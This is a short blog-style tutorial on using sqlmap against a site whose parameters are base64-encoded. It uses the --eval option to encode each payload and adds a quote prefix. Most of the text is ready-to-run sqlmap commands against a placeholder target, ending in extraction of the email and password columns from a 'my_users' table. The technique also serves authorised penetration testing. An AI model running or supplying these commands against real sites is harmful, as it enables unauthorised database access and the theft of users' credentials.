sqlmap advanced tips and tricks

Today we’re going to look at using sqlmap when the target website uses base64 encoded parameters.

For example, we have something like:

http://<target>/products/article.php?art_id=<base64_encoded_value>

In this case we have to “convince” sqlmap that when scanning, to use base64 for all payloads. Well, I guess it’s a good thing that sqlmap has the following option which allows you to add your custom python code:

--eval=EVALCODE        Evaluate provided Python code before the request

In python, if you want to encode a string using base64, you need something like:

import base64
print(base64.b64encode('MY_STRING'))

Tip: Would be useful to determine if you need a prefix as well (something like ‘ or “)

Once you get the database name,

In the end, the command will look something like this:

sqlmap -u "http://<target>/products/article.php?art_id=" -p art_id --eval "import base64; art_id = base64.b64encode(art_id)" -v 3 --prefix="' "

Once you got a list of tables and let’s say you only want to retrieve the columns from the my_users table, you can add the -D and -T parameters.

sqlmap -u "http://<target>/products/article.php?art_id=" -p art_id --eval "import base64; art_id = base64.b64encode(art_id)" -v 3 --prefix="' " -D my_db -T my_users

If you only want to focus on specific fields, you can use the -C option:

sqlmap -u "http://<target>/products/article.php?art_id=" -p art_id --eval "import base64; art_id = base64.b64encode(art_id)" -v 3 --prefix="' " -D my_db -T my_users -C my_email,my_password

Hope this helps!